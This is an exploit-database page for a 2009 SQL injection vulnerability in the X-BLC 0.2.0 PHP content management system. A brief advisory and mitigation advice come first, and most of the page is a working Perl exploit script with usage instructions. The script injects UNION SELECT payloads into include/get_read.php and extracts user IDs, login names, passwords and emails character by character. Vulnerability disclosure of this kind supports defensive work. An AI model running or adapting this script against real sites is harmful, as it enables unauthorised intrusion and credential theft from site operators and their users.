X-BLC - exploit.company

vendor:

X-BLC

by:

dun

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: X-BLC

Affected Version From: 0.2.0

Affected Version To: 0.2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:biolawcom:xblc

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

X-BLC <= 0.2.0 SQL Injection Vulnerability

X-BLC is a dynamic web content management system written in PHP. A SQL injection vulnerability exists in X-BLC <= 0.2.0 which allows an attacker to extract data from the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'include/get_read.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can allow the attacker to extract data from the database such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL statements in an application. Parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w

#  :::::::-.   ...    ::::::.    :::.
#   ;;,   `';, ;;     ;;;`;;;;,  `;;;
#   `[[     [[[['     [[[  [[[[[. '[[
#    $$,    $$$$      $$$  $$$ "Y$c$$
#    888_,o8P'88    .d888  888    Y88
#    MMMMP"`   "YmmMMMM""  MMM     YM
#   [ Discovered by dun \ dun[at]strcpy.pl ]
#
######################################################
#  [ xblc <= 0.2.0 ]   SQL Injection Vulnerability   #
######################################################
# 
# Script: "X-BLC is a dynamic web content management system written in PHP..."
#
# Script site: http://www.biolawcom.de/xblc/ ,	http://sourceforge.net/projects/xblc/
# Download: http://downloads.sourceforge.net/xblc/xblc-0.2.0.zip?use_mirror=fastbull
#
# Usage: perl expl.pl http://www.biolawcom.de/demo/
#
#######################################################
#
# [ dun / 2009 ] 

use IO::Socket;
use Socket;
use IO::Select;

my @tables=("id","login_name","password","email","status");

if(scalar(@ARGV) < 1) {
	print "\nUsage: perl expl.pl http://site.com/path/\n\n";
	exit;
}

foreach $t (@tables) {
$i=1;
print $t." = ";
  do {
	$path 	= "include/get_read.php?section=-1+UNION+SELECT+ORD(SUBSTRING(".$t.",".$i.",1))+FROM+users/*";
	$host 	= $ARGV[0].$path;
	#############################################
	# $page = http_query($host, $proxy, $port); #
	#############################################
	$page = http_query($host);
	$page =~ /guest=(.*)\,runTime=/;
	$char=$1;
	print chr($char);
	$i++;
  } while($char != 0);
  print "\n";
}
  
sub http_query {
 my $page="";
 my $url=$_[0];
 if(defined($_[1]) && defined($_[2])) {
	$host=$_[1];
	$port=$_[2];
	$get="GET $url HTTP/1.0\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nCookie: id=1\r\nConnection: Close\r\n\r\n";
 } else {
	$port=80;
	$url=~s/http:\/\///;
	$host=$url;
	$query=$url;
	$host=~s/([a-zA-Z0-9\.]+)\/.*/$1/;
	$query=~s/$host//;
	if ($query eq "") {$query="/";};
	$get="GET $query HTTP/1.0\r\nHost: $host\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nCookie: id=1\r\nConnection: Close\r\n\r\n";
 }
 my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"$port",Proto=>"tcp",Timeout => 3) or return;
 print $sock $get;
 my @r = <$sock>;
 $page="@r";
 close($sock);
 	
 return $page;
}

# milw0rm.com [2009-03-23]